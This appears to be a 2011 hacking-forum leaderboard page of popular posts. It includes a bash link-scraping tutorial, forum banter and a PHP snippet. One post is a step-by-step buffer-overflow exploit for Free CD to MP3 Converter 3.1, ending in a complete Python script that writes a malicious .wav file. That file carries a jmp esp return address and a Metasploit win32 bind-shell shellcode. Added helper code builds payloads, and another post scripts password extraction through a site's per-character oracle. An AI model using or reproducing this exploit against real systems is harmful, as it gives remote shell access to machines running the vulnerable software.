Leaderboard
Popular Content
Showing content with the highest reputation on 07/22/11 in all areas
-
Linux Bash fun

Programs used: wget, grep, bash, cat, cut, sort
Operating system required: Any Linux Distro
Sites used: ICQ

Let's say we see a site with several links in it, and we want to save those links neatly into a file on our HDD, one under the other. We start by downloading the page we want to take the links from onto our HDD/SSD. For that we first have to open a console. So press the key combination Alt+F2 to type the command that launches an application in Linux. I should mention that in Linux, because it is an open-source distribution made by everyone for everyone, there are very many alternative programs in any area you might venture into in a Linux distro, so I will give just 3 examples of "terminal emulators":
- gnome-terminal (my favourite, the default in GNOME)
- konsole (the default in KDE)
- xterm (which is said to be the best)

Once you are in the console, we can start having fun. The first command we will use is called wget. If you want, you can type "man wget" to find out more about this little program. Now let's type:

wget http://www.iana.org/domains/example/

Your output should look like this:

root@bt:~/tutorial# wget http://www.icq.com
--2011-07-22 15:59:20-- http://www.icq.com/
Resolving www.icq.com... 64.12.249.140
Connecting to www.icq.com|64.12.249.140|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.icq.com/en [following]
--2011-07-22 15:59:20-- http://www.icq.com/en
Reusing existing connection to www.icq.com:80.
HTTP request sent, awaiting response... 200 OK
Length: 45021 (44K) [text/html]
Saving to: `index.html'
100%[==================================================================================================================>] 45,021 158K/s in 0.3s
2011-07-22 15:59:21 (158 KB/s) - `index.html' saved [45021/45021]

To check that the file was downloaded, you can type ls -l or dir and see whether a file named index.html exists:

root@bt:~/tutorial# ls -l
total 4
-rw-r--r-- 1 root root 2945 2011-02-09 19:13 index.html

Now we will use the program called grep to select certain lines from a file. In HTML code, links are preceded by href=, which tells the computer that a link follows. So we will use grep to find only the lines that contain "href=":

grep "href=" index.html

By the way, you can likewise use "man grep" to find out more about this program. If everything went well, your output should be the lines of code that contain "href=". But we have not quite got where we wanted, have we? And on top of that we have some lines of code that have nothing to do with the links we are after. To "cut" out what we don't need, we will use a program called cut. Be sure to read cut's documentation with the command man cut to understand better how it works and, as usual, experiment!!! If we cut the lines using "/" as the delimiter and keep the third field, and then cut again using '"' as the delimiter and keep the first field, we should be closer to what we want:

root@bt:~/tutorial# grep "href=" index.html|cut -d"/" -f3|cut -d'"' -f1
fonts.googleapis.com
ftp.icq.com
www.icq.com
download.icq.com
download.icq.com
www.icq.com
download.icq.com
www.icq.com
www.icq.com
download.icq.com
download.icq.com
www.icq.com
www.icq.com
www.icq.com
www.icq.com
games.icq.com
games.icq.com
icq.miniclip.com
partner.bigpoint.net
people.icq.com
......................

It seems that many results repeat, and we are only interested in the icq servers. So we will use grep again, and sort. Again, don't forget to read the manual: "man sort". The command, as we planned it, should finally look like this:

grep "href=" index.html|cut -d"/" -f3|cut -d'"' -f1|grep "icq.com"|sort -u

And the output should be simple and clean, exactly as we wanted. And so it seems we have reached the end of this exercise. Constructive criticism and corrections are welcome. Next Episode: Linux Console Fun Continued. Rep me if you like it ^^ It motivates me
2 points
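The grep/cut pipeline in the post above works on that particular page but silently drops single-quoted href values, relative links (no third "/" field) and protocol-relative URLs, and it cannot tell a port suffix from a path. As an added example, not part of the original post, here is the same host extraction done with Python's html.parser and urllib.parse, which handles all of those cases; the HTML and the base URL below are constructed stand-ins for the downloaded index.html, not the real icq.com page.

```python
"""Extract the unique hosts linked from a saved HTML page.

Added example, not from the original post: the grep/cut pipeline breaks on
single-quoted hrefs, relative links and protocol-relative URLs. A real HTML
parser plus urljoin handles them all.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page (stand-in for the downloaded index.html).
SAMPLE_HTML = """<html><body>
<a href="http://www.icq.com/en">home</a>
<a href='http://download.icq.com/download/msgr.exe'>single-quoted href</a>
<link href="//fonts.googleapis.com/css?family=Arial" rel="stylesheet">
<a href="/en/about">relative link, resolved against the page URL</a>
<a href="http://www.icq.com/en/games">games</a>
<a href="https://people.icq.com:8443/profile">explicit port</a>
<a href="mailto:support@icq.com">not an http link</a>
</body></html>"""

# URL the sample page is assumed to have been fetched from (assumption).
BASE_URL = "http://www.icq.com/en"


class HrefCollector(HTMLParser):
    """Collect every href attribute, whatever tag or quoting style it uses."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name == "href" and value:
                self.hrefs.append(value)


def extract_hosts(html, base_url, domain=None):
    """Return the sorted set of hostnames referenced by href= attributes.

    Relative links are resolved against base_url; only http(s) targets are
    kept; if domain is given, only that host and its subdomains are returned
    (the post's grep "icq.com" | sort -u step, done precisely).
    """
    parser = HrefCollector()
    parser.feed(html)
    hosts = set()
    for href in parser.hrefs:
        parts = urlsplit(urljoin(base_url, href))
        host = parts.hostname  # already lower-cased, port stripped
        if parts.scheme not in ("http", "https") or not host:
            continue
        if domain is None or host == domain or host.endswith("." + domain):
            hosts.add(host)
    return sorted(hosts)


if __name__ == "__main__":
    for host in extract_hosts(SAMPLE_HTML, BASE_URL, "icq.com"):
        print(host)
```

Run it as-is and it prints the three icq.com hosts; drop the domain argument to see fonts.googleapis.com included as well. The mailto: link is discarded because its scheme is not http(s), which is the check the grep pipeline has no way to make.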
-
[+] Written by D4rk357
[+] Special thanks to Peter Van Eeckhoutte for his awesome exploit writing series.
[+] Thanks to Fb1h2s for helping me out along the way
[+] garage4hackers

In this tutorial I will start from scratch and build a working exploit. A public exploit for this is already available here: Free CD to MP3 Converter 3.1 Buffer Overflow Exploit. The first step is downloading and installing the vulnerable application from here: Application. Install Immunity Debugger, OllyDbg or WinDbg; any one of them will do.

Now we will write a simple Python script which generates a .wav file, and test the application against it:

# Python 2 script: write 30000 "A" bytes (0x41) into crash.wav
handle = open("crash.wav", "a")
Crap = "\x41" * 30000
handle.write(Crap)
handle.close()

This little script, when executed, generates a file named crash.wav. Open the debugger of your choice, in my case Immunity Debugger. Open the executable of CD to MP3 Converter and then click on execute.
[screenshot: Open]
[screenshot: Execute]

Now open your crash.wav file in CD to MP3 Converter under the "wav to wav converter" option and BOOM, the application dies instantly. Now check your debugger for what exactly happened. Woot woot, EIP has been overwritten. Not only EIP but a few more registers have been overwritten, thus increasing our chances of making a working exploit for this vulnerability.

Now the next step is to determine the exact position at which EIP is overwritten. For that we will use a couple of tools which come with Metasploit. On the Windows platform, open Cygwin and then browse to the tools directory of Metasploit. Once inside it, execute the pattern_create.rb script, which generates a string of unique characters of whichever size you want. By reducing the size of Crap again and again in my script and still getting a crash, I figured out that a string of 5000 unique characters will be more than enough. Syntax:

./pattern_create.rb 5000

Once the pattern is created, copy it and put it in place of Crap. Now execute the application from the debugger again and feed it the newly generated crash.wav (delete the previous crash.wav file before doing it, as I am opening the file in append mode). Check the debugger again and you can see some numbers in EIP, which in my case is 31684630. Now in the Cygwin shell we will run pattern_offset to check where exactly EIP is being overwritten. Syntax:

./pattern_offset.rb 31684630 5000

And the location it gives me is 4112. Great. So, just to cross-check that the position of EIP given by the tool is correct, we will write a small script:

# Python 2 script: 4112 bytes of padding, then the 4 bytes that land in EIP
handle = open("crash.wav", "a")
Crap = "\x41" * 4112
Eip = "\x42" * 4
handle.write(Crap + Eip)
handle.close()

Again open the program through Immunity Debugger and execute it. After the application crashes, check EIP and you find 42424242 there, which means the offset found by the tool is correct.

Now we have to find the location of an instruction in a DLL that calls or jumps to ESP, such as jmp esp. We will load the application again in the debugger and search for a jmp esp instruction in every DLL that is loaded. (In Immunity Debugger we can look at the executable modules screen, double-click on each DLL that is loaded and then search for the specific instruction in that address space.) After some tinkering we find that the DLL winmm.dll has a jmp esp instruction at 76B43ADC. Great, now we have almost everything we need to make a workable exploit. The address 76 B4 3A DC will be written as \xDC\x3A\xB4\x76, since we are passing it as a string to EIP. We will use the win32 bind shell provided by Metasploit, encoded with the Alpha2 encoder. We will add some NOPs (no-operation bytes) before the start of our shellcode because, generally, some bytes at the start are not interpreted by the processor as instructions, so they could cause our exploit to fail. Adding NOPs increases the reliability of the exploit.

And we get a telnet connection \m/

[P.S.] You will have to write your own exploit (modify EIP), as I used a hard-coded address. Don't try post-mortem debugging; the debugger is not catching it (at least on my computer).

P.S. Here's the source code:

# Python 2 script: str literals are raw bytes, so text mode is fine here
handle = open("final.wav", "a")
Crap = "\x41" * 4112                 # padding up to the saved return address
Eip = "\xDC\x3A\xB4\x76"             # jmp esp in winmm.dll (76B43ADC), little-endian
# win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
ShellCode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x43"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x53\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x62"
"\x4a\x48\x6b\x70\x4d\x38\x68\x6c\x39\x4b\x4f\x79\x6f\x6b\x4f\x73"
"\x50\x4c\x4b\x72\x4c\x46\x44\x57\x54\x4e\x6b\x31\x55\x67\x4c\x4e"
"\x6b\x63\x4c\x34\x45\x62\x58\x46\x61\x48\x6f\x4e\x6b\x50\x4f\x44"
"\x58\x6c\x4b\x51\x4f\x45\x70\x44\x41\x6a\x4b\x70\x49\x6e\x6b\x35"
"\x64\x4c\x4b\x53\x31\x78\x6e\x75\x61\x6b\x70\x4f\x69\x6e\x4c\x4b"
"\x34\x4f\x30\x53\x44\x57\x77\x6f\x31\x4b\x7a\x74\x4d\x75\x51\x69"
"\x52\x68\x6b\x48\x74\x57\x4b\x70\x54\x64\x64\x47\x58\x50\x75\x6d"
"\x35\x4c\x4b\x31\x4f\x36\x44\x56\x61\x78\x6b\x63\x56\x6c\x4b\x54"
"\x4c\x70\x4b\x4e\x6b\x53\x6f\x75\x4c\x47\x71\x5a\x4b\x63\x33\x54"
"\x6c\x4e\x6b\x6b\x39\x30\x6c\x44\x64\x35\x4c\x71\x71\x5a\x63\x34"
"\x71\x6b\x6b\x72\x44\x6c\x4b\x37\x33\x76\x50\x4e\x6b\x71\x50\x56"
"\x6c\x6c\x4b\x44\x30\x65\x4c\x4c\x6d\x4c\x4b\x77\x30\x35\x58\x61"
"\x4e\x62\x48\x6c\x4e\x62\x6e\x44\x4e\x38\x6c\x50\x50\x4b\x4f\x5a"
"\x76\x45\x36\x70\x53\x41\x76\x32\x48\x70\x33\x56\x52\x45\x38\x42"
"\x57\x72\x53\x34\x72\x63\x6f\x72\x74\x6b\x4f\x78\x50\x72\x48\x38"
"\x4b\x58\x6d\x6b\x4c\x65\x6b\x42\x70\x49\x6f\x69\x46\x71\x4f\x6c"
"\x49\x6a\x45\x65\x36\x4f\x71\x4a\x4d\x35\x58\x53\x32\x50\x55\x32"
"\x4a\x35\x52\x49\x6f\x48\x50\x31\x78\x7a\x79\x36\x69\x4c\x35\x6c"
"\x6d\x70\x57\x39\x6f\x6e\x36\x70\x53\x32\x73\x62\x73\x56\x33\x52"
"\x73\x73\x73\x52\x73\x33\x73\x30\x53\x6b\x4f\x4a\x70\x35\x36\x75"
"\x38\x52\x31\x41\x4c\x61\x76\x50\x53\x4d\x59\x4d\x31\x4d\x45\x55"
"\x38\x69\x34\x56\x7a\x42\x50\x5a\x67\x36\x37\x79\x6f\x7a\x76\x61"
"\x7a\x76\x70\x66\x31\x73\x65\x39\x6f\x68\x50\x41\x78\x4d\x74\x4e"
"\x4d\x76\x4e\x68\x69\x42\x77\x79\x6f\x59\x46\x36\x33\x66\x35\x69"
"\x6f\x6e\x30\x45\x38\x4b\x55\x51\x59\x6f\x76\x72\x69\x42\x77\x6b"
"\x4f\x4a\x76\x70\x50\x46\x34\x36\x34\x53\x65\x79\x6f\x6e\x30\x6c"
"\x53\x65\x38\x4b\x57\x70\x79\x5a\x66\x52\x59\x30\x57\x69\x6f\x6a"
"\x76\x30\x55\x59\x6f\x6e\x30\x70\x66\x70\x6a\x53\x54\x72\x46\x62"
"\x48\x65\x33\x50\x6d\x6c\x49\x4d\x35\x31\x7a\x52\x70\x70\x59\x44"
"\x69\x7a\x6c\x4c\x49\x69\x77\x51\x7a\x71\x54\x4f\x79\x4b\x52\x34"
"\x71\x39\x50\x4c\x33\x4d\x7a\x6b\x4e\x71\x52\x44\x6d\x6b\x4e\x37"
"\x32\x54\x6c\x4e\x73\x4e\x6d\x33\x4a\x56\x58\x6c\x6b\x6c\x6b\x6e"
"\x4b\x53\x58\x64\x32\x69\x6e\x6c\x73\x44\x56\x6b\x4f\x73\x45\x47"
"\x34\x4b\x4f\x79\x46\x33\x6b\x42\x77\x73\x62\x30\x51\x73\x61\x72"
"\x71\x62\x4a\x33\x31\x42\x71\x50\x51\x72\x75\x50\x51\x49\x6f\x78"
"\x50\x71\x78\x4e\x4d\x39\x49\x75\x55\x6a\x6e\x70\x53\x4b\x4f\x59"
"\x46\x32\x4a\x4b\x4f\x49\x6f\x56\x57\x69\x6f\x5a\x70\x4e\x6b\x33"
"\x67\x49\x6c\x6d\x53\x39\x54\x55\x34\x39\x6f\x4b\x66\x31\x42\x69"
"\x6f\x4a\x70\x62\x48\x78\x70\x4d\x5a\x35\x54\x63\x6f\x70\x53\x39"
"\x6f\x4e\x36\x39\x6f\x38\x50\x43")
nops = "\x90" * 50                   # NOP sled in front of the shellcode
handle.write(Crap + Eip + nops + ShellCode)
handle.close()

Source: here.
1 point
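As an added example, not from the original post and not Metasploit's own code, the following Python reimplements what pattern_create.rb and pattern_offset.rb do, so the numbers in the post (EIP reading 31684630 at offset 4112) can be checked offline, and it packs the winmm.dll address the way it has to appear in the file. The only assumption is the pattern alphabet (A-Z, a-z, 0-9 in three-character groups), which is what the Metasploit tools use.

```python
"""Metasploit-style cyclic pattern, offset lookup and return-address packing.

Added example, not from the original post or from Metasploit: enough of
pattern_create / pattern_offset to verify the 4112 offset offline, plus the
little-endian packing that turns 76B43ADC into the bytes DC 3A B4 76.
"""
import string
import struct


def pattern_create(length):
    """Return `length` bytes of the pattern Aa0Aa1Aa2...Zz9 (assumed alphabet).

    Every 4-byte window within the first 20280 bytes is unique, which is why
    the 4 bytes that reach EIP pin down exactly one offset.
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_hex, length):
    """Offset of the 4 bytes that landed in EIP, or -1 if they are not in the pattern.

    The debugger shows EIP as a little-endian dword, so the bytes as they sat
    in memory are the reverse of the hex digits shown: 31684630 -> b"0Fh1".
    """
    needle = bytes.fromhex(eip_hex)[::-1]
    return pattern_create(length).find(needle)


def p32(addr):
    """Pack a 32-bit address little-endian, the way it must be written to the file."""
    return struct.pack("<I", addr)


def build_payload(offset, ret_addr, shellcode, nop_count=50):
    """Padding + return address + NOP sled + shellcode, the layout the post uses."""
    return b"A" * offset + p32(ret_addr) + b"\x90" * nop_count + shellcode


if __name__ == "__main__":
    print(pattern_offset("31684630", 5000))   # the post's offset, 4112
    print(p32(0x76B43ADC).hex())              # dc3ab476, i.e. \xDC\x3A\xB4\x76
```

Reading the dword shown in the debugger backwards before searching is the whole trick behind pattern_offset: forget to reverse it and the search fails, because the pattern never contains "1hF0". p32 is what you would use instead of hand-typing the escaped address, and build_payload returns bytes, so on Python 3 open the output file with "wb" rather than the post's text-mode "a".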
-
Tutorial intended for beginners. Personal note: I liked it very much because it is friendly to the noob and does not put on any "academic pressure" the way real books do (by using hard terminology etc.). Beej's Guide to C Programming PDF [US Letter, one-sided]: http://beej.us/guide/bgc/output/print/bgc_USLetter.pdf Enjoy =]
1 point
-
1) You use too many emoticons 2) You call anyone who tells you something an "idiot" 3) You put on airs but cannot prove anything about milw0rm. One more post like the ones above and you get a ban.
1 point
-
@icebird Admission 2011, Bachelor level -> Selection criteria (you can also look at Facilities for graduates if you have some diplomas)
1 point
-
Tell me the name of the owner of milw0rm (the one who had the idea). And how many people ran the site from the first day after it opened. Tell me how many servers milw0rm had and where it was hosted. Since you did pen-testing on them, I am sure you knew these details. And which Linux distribution their server(s) used (that one is to give you a hint). I will be less sceptical once you answer these.
1 point
-
What the hell kind of tutorial do you need in order to use a keylogger? If someone cannot manage two or three clicks, they should switch off the computer and go outside. What is so damn hard about putting a lousy proxy in the browser settings and being anonymous through NASA's servers? And by "do SQL injection on administrators' login pages", what did you mean? SQLi can be done wherever there is an... "unstable" parameter, let's call it that. The things here are public, anyone can read them. You have "96" in all your IDs and you say you are 19. Credible, why not? And even if you had ever been part of the milw0rm team, why would you, of all people, register here? P.S.: in Linux it is called a terminal, not cmd.
1 point
-
I used the length given by em, so I would not have to extract it again.

# Python 3 port of the script; the target sends back one <span> per password
# position and colours it green where the submitted character is correct.
import urllib.request

target = "http://crs12decoder.comoj.com/findpw.php"
ALPHA = 'abcdefghijklmnopqrstuvwxyz'
LENGTH = 391  # password length, taken from the page rather than probed
currentpassword = ['a'] * LENGTH


def trypassword(letter):
    """Set every position of the pw cookie to `letter` and record the
    positions the page marks green; retry on a network error."""
    guess = letter * LENGTH
    req = urllib.request.Request(target, headers={'Cookie': 'pw=' + guess})
    while True:
        try:
            with urllib.request.urlopen(req, timeout=10) as f:
                body = f.read().decode('utf-8', 'replace')
            break
        except OSError:
            print('Connection timed out, retrying')
    chars = body.split('</span>')
    for i in range(min(LENGTH, len(chars))):
        if 'green' in chars[i]:
            currentpassword[i] = letter


for letter in ALPHA:
    print('Trying', letter)
    trypassword(letter)

print(''.join(currentpassword))
1 point
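The script above depends on the page colouring a <span> green for every position where the submitted character is right, which is an oracle that leaks one bit per position per request. As an added example, not part of the original post, the following replaces the remote page with a constructed local oracle (fake_findpw; the secret and the HTML shape are assumptions) so the extraction strategy can be run offline: one request per alphabet letter, with every position set to that letter, recovers the whole password in 26 requests rather than 26 times the length.

```python
"""Position-by-position oracle extraction, simulated offline.

Added example, not from the original post. fake_findpw stands in for the
challenge page: one <span> per password position, coloured green when the
submitted character at that position matches. SECRET is constructed.
"""
import string

SECRET = "zebracrossingsareblackandwhite"   # constructed secret (assumption)
ALPHA = string.ascii_lowercase


def fake_findpw(cookie_pw, secret=SECRET):
    """Stand-in for findpw.php: render a span per position, green if correct."""
    spans = []
    for i, expected in enumerate(secret):
        got = cookie_pw[i] if i < len(cookie_pw) else ""
        colour = "green" if got == expected else "red"
        spans.append('<span style="color:%s">%s</span>' % (colour, got or "_"))
    return "<html><body>" + "".join(spans) + "</body></html>"


def green_positions(html):
    """Indexes of the spans the oracle coloured green."""
    chunks = html.split("</span>")[:-1]   # drop the tail after the last span
    return [i for i, chunk in enumerate(chunks) if "green" in chunk]


def probe_length(oracle, max_len=512):
    """Count the spans rendered for an over-long cookie to learn the length."""
    return len(oracle("a" * max_len).split("</span>")) - 1


def recover_password(oracle, length, alphabet=ALPHA):
    """Recover `length` characters with one oracle call per alphabet symbol.

    Each call sets every position to the same letter, so the green spans in
    the reply are exactly the positions where that letter is correct.
    """
    recovered = [None] * length
    for letter in alphabet:
        for pos in green_positions(oracle(letter * length)):
            if pos < length:
                recovered[pos] = letter
    return "".join(c if c is not None else "?" for c in recovered)


if __name__ == "__main__":
    n = probe_length(fake_findpw)
    print(n, recover_password(fake_findpw, n))
```

A "?" in the result means no letter in the alphabet was accepted at that position, which is the signal to widen the alphabet (digits, punctuation) rather than to trust the output. probe_length reproduces what the post did by hand when it took the length from the page.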
-
You put the clips in this part:

//put the clip's code into the array
$clipuri = array(
0 => "wK2U0dYZeQI",
1 => "YFK6H_CcuX8",
2 => "ctLnNQOVg0E"
);

What you see here is what comes after v= in a link such as http://www.youtube.com/watch?v=PoTEnaAI9Fo, for example. You just keep adding, for example:

//put the clip's code into the array
$clipuri = array(
0 => "wK2U0dYZeQI",
1 => "YFK6H_CcuX8",
2 => "ctLnNQOVg0E",
3 => "PoTEnaAI9Fo"
);

Further down, you change

//pick a random code from the array
$rand = $clipuri[rand(0,3)];

Basically, this line says to pick a random clip, from 0 to 3. If you have... 1000 videos, you put (0,1000). If you only want... 100 of them, and they are from.. 100 to 199, you put (100,199). That's about it. PS: Well done, Synthesis.
-1 points
This leaderboard is set to Bucharest/GMT+02:00